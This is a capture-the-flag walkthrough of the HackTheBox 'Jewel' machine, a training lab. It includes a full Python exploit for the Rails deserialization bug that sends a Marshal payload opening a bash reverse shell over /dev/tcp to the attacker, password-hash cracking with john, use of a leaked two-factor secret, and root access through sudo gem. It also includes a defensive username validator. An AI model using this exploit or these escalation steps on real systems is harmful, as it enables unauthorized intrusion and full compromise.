Jewel HackTheBox WalkThrough

This is the Jewel HackTheBox machine walkthrough. In this write-up I have demonstrated step-by-step how I rooted the Jewel HTB machine. Before starting, let us know something about this machine: it is a Linux machine with IP address 10.10.10.211 and difficulty Medium, as assigned by its maker.

First of all, connect your PC to the VPN and make sure of your connectivity with the Jewel machine by pinging its IP 10.10.10.211. If all goes correctly, it is time to start hacking. As usual, I started by scanning the machine. Scanning gives us an idea of how to proceed further: it helps in banner grabbing the services running on different ports and sometimes it helps in vulnerability scanning as well. I have used nmap for this task and the result is given below:-
Scanning
$ sudo nmap -sC -sV -oN jewel_scan.nmap 10.10.10.211

Nmap revealed that ports 22, 8000 and 8080 are open: SSH on port 22, Apache2 on port 8000 and the nginx webserver on port 8080. The nmap script http-generator reported that the website on port 8000 uses the gitweb 2.20.1 interface. Since apache2 is running on port 8000 there will be some website at the URL http://10.10.10.211:8000, and since nginx is running on port 8080 there will also be some website at the URL http://10.10.10.211:8080.
I began by enumerating port 8000 because websites have more attack surface. Searched for available exploits for gitweb 2.20.1 using searchsploit but found none. Going to the URL https://10.10.10.211:8000 got redirected to http://10.10.10.211:8000/gitweb/ . After some enumeration found a file named bd.sql at the URL http://10.10.10.211:8000/gitweb/?p=.git;a=blob;f=bd.sql;h=a7fddb693ca735f8aa1e4b09046cec2adddddc51;hb=HEAD. Hashes of the users bill and jennifer are present in this file. Saved them to a file to crack using john and rockyou.txt. The extracted hashes are
$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy

Searched online for the type of this hash and found that it is a bcrypt hash (the $2a$ prefix).
Identifying Hash Type

Then tried to crack them using john but couldn't crack either of them. After further enumeration could not find any way into the Jewel machine, so moved ahead to enumerate port 8080. As the Phusion Passenger 6.0.6 service is listed by nmap, tried searching for available exploits for it using searchsploit but again found nothing. Going to the URL http://10.10.10.211:8080/login found a login page. Tried some basic SQL injection but it is not vulnerable. There is also a signup page, so registered an account with the creds
Username : test1
Email : [email protected]
Password : test1
After logging in with the creds [email protected] : test1, under the profile menu tried to test for some injection attacks in the username field (because it is the only field we can manipulate) but could not get success. Till now I hadn't found any potential vector to get into the Jewel machine.
After getting some hints from the HTB forum and the internet, found that the webserver is using Ruby on Rails version < 5.2.4.3, which is vulnerable to a deserialization attack. The current versions of ruby and ruby on rails can be found at the URL http://10.10.10.211:8000/gitweb/?p=.git;a=commitdiff;h=5d6f436256c9575fbc7b1fb9621b18f0f8656741
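From the defender's side, the real fix for this bug is upgrading Rails, but a defence-in-depth check on the user[username] parameter would have stopped the payload used on this page, because a Ruby Marshal stream always starts with the bytes 0x04 0x08 and the PoC's gadget class name is a fixed string. The script below is an added example, not the blog application's code; the username allowlist pattern is an assumption.

```python
import re

# Ruby Marshal streams begin with the format version bytes 0x04 0x08.
MARSHAL_MAGIC = "\x04\x08"
# Gadget class used by the Rails < 5.2.4.3 PoC discussed on this page.
GADGET_CLASS = "ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"
# Assumed allowlist for the blog's usernames (not the app's real rule).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{3,32}")


def looks_like_marshal(value):
    """True if a form field carries a serialized Ruby object or the known gadget."""
    return value.startswith(MARSHAL_MAGIC) or GADGET_CLASS in value


def validate_username(value):
    """Defence-in-depth check for the user[username] parameter.
    Returns (accepted, reason); the real fix is upgrading Rails."""
    if looks_like_marshal(value):
        return False, "serialized Ruby object in username"
    if not USERNAME_RE.fullmatch(value):
        return False, "username outside allowed character set"
    return True, "ok"


def scan_submissions(values):
    """Return [(value, reason)] for every submission that would be rejected,
    e.g. when replaying request logs to hunt for exploitation attempts."""
    rejected = []
    for value in values:
        ok, reason = validate_username(value)
        if not ok:
            rejected.append((value, reason))
    return rejected


# Constructed sample submissions: two legitimate usernames, a basic SQL
# injection probe, and the page's payload cut off after the gadget class name.
SAMPLE_SUBMISSIONS = [
    "bill",
    "test1",
    "x' OR 1=1--",
    "\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy",
]

if __name__ == "__main__":
    for value, reason in scan_submissions(SAMPLE_SUBMISSIONS):
        print(f"REJECT {value!r}: {reason}")
```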

The working PoC can be found on GitHub, and more information about this vulnerability can be found on the Google Forum. You can follow the steps given in the GitHub PoC. I tried to exploit this vulnerability using the above method and could easily exploit it as described in the GitHub PoC. For simplicity @randomname83 has created a python script to get a user shell. All you have to do is copy the script code, paste it in a file named rev.py and run the script as shown in the screenshot after starting a netcat listener. The script code is
import requests
import re
import sys

# check the arguments before they are used
if len(sys.argv) != 4:
    print("usage: python3 rev.py <target IP> <your IP> <your port>")
    sys.exit(1)

URL = 'http://{}:8080'.format(sys.argv[1])
username = 'myuser4'
password = 'mypass4'
email = '[email protected]'

s = requests.Session()
# fetch the CSRF token from the signup page
resp = s.get(URL + '/signup')
rx = r'token" content="(.*)"'
token = re.search(rx, resp.text).group(1)

# create user
data = {}
data['utf8'] = '✓'
data['authenticity_token'] = token
data['user[username]'] = username
data['user[email]'] = email
data['user[password]'] = password
data['commit'] = 'Create User'
resp = s.post(URL + '/users', data=data)

# login
data = {}
data['utf8'] = '✓'
data['authenticity_token'] = token
data['session[email]'] = email
data['session[password]'] = password
data['commit'] = 'Log in'
resp = s.post(URL + '/login', data=data)
rx = r'href="/users/(.*)"'
user_id = re.search(rx, resp.text).group(1)

# rev shell: Ruby Marshal payload from the PoC carrying the reverse shell command
rev = "bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(sys.argv[2], sys.argv[3])
payload = '\x04\x08o\x3A\x40ActiveSupport\x3A\x3ADeprecation\x3A\x3ADeprecatedInstanceVariableProxy'
payload += '\x09\x3A\x0E\x40instanceo\x3A\x08ERB\x08\x3A\x09\x40srcI\x22'
payload += '{}\x60{}\x60'.format(chr(len(rev)+7), rev)
payload += '\x06\x3A\x06ET\x3A\x0E\x40filenameI\x22\x061\x06\x3B\x09T\x3A\x0C\x40linenoi\x06\x3A\x0C\x40method\x3A'
payload += '\x0Bresult\x3A\x09\x40varI\x22\x0C\x40result\x06\x3B\x09T\x3A\x10\x40deprecatorIu\x3A\x1F'
payload += 'ActiveSupport\x3A\x3ADeprecation\x00\x06\x3B\x09T'

# update the profile with the payload as username (posted twice, as in the PoC)
data = {}
data['utf8'] = '✓'
data['authenticity_token'] = token
data['_method'] = 'patch'
data['user[username]'] = payload
data['commit'] = 'Update User'
s.post(URL + '/users/' + user_id, data=data)
s.post(URL + '/users/' + user_id, data=data)
# trigger deserialization of the cached username
s.get(URL + '/articles')
Getting User Shell
$ python3 rev.py 10.10.10.211 10.10.14.19 1234
$ nc -nvlp 1234
$ id && whoami

We got a shell. Let us upgrade it to a fully interactive Linux shell so that we can execute advanced Linux commands.
Upgrading Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm

We have upgraded our shell. Let us capture the user flag.
Capture User Flag
$ cat user.txt

Privilege Escalation
To escalate privilege to root we first have to find a privilege escalation vector. During initial enumeration ran the command $sudo -l to check if any special privilege is given to user bill, but it requires a password. Then ran linpeas.sh (a post-exploitation enumeration script) to find a privilege escalation vector. Linpeas found two password hashes inside the files dump_2020-08-27.sql and bd.sql, present in the directories /var/backups/ and /home/bill/blog/ respectively. The hashes are
jennifer : $2a$12$sZac9R2VSQYjOcBTTUYy6.Zd5I02OnmkKnD3zA6MqMrzLKz0jeDO
Unknown : $2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
On listing the content of the file dump_2020-08-27.sql got another hash, of user bill, which is
bill : $2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW
We now have a total of three hashes to crack. Among them, one is for user jennifer, who doesn't exist on the machine, and the owner of the second is not known. So we are left with the one hash of bill.

Tried to crack it using john and could easily crack it.
Cracking Hash
$ vi creds.hash
$ sudo john --format=bcrypt creds.hash --wordlist=/usr/share/wordlists/rockyou.txt
$ sudo john creds.hash --show

John has successfully cracked the hash and the credential is bill : spongebob. Tried to run the command $sudo -l again to check for any special privilege given to user bill; after entering the password it asked for a Verification Code. It appears that some two-factor authentication is enabled for normal users to run the $sudo -l command. After some more enumeration got a hidden file google_authenticator inside the home directory. There is a secret code inside this file, 2UQI3R52WFCLE6JTLDCSJYMJH4, which can be used to generate the OTP. I have used the Authenticator add-on for Firefox to generate the OTP from this secret key.

Installed the Authenticator add-on by just clicking this Firefox URL.

After installing the add-on click on + > Manual Entry > Issuer: Anything & Secret : 2UQI3R52WFCLE6JTLDCSJYMJH4 > OK.
Copy the OTP, type the command $sudo -l, then the password spongebob, then enter the OTP as the Verification Code.
$ sudo -l
~spongebob
~622463

So $sudo -l revealed that user bill can run the gem binary as any user. If you get output like this, where the user can run (ALL : ALL) /usr/bin/gem, the best place to find your exploit is GTFOBins (remember this). After going to that URL you can find the exploit to escalate privilege.

Finding PrivEsc Vector
So here our privilege escalation vector is Sudo Right Exploitation to get root. Let us get a root shell and capture the root flag.
Getting Root Shell
$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc
# whoami && id

Capture Root Flag
# cat /root/root.txt

This was how I rooted the Jewel HackTheBox machine. I learnt a lot during this challenge and hope you have also learnt some new things. Thanks for reading this walkthrough. Share your experience in the comment section. If you want to give any suggestion about the write-up, feel free to write to us at [email protected].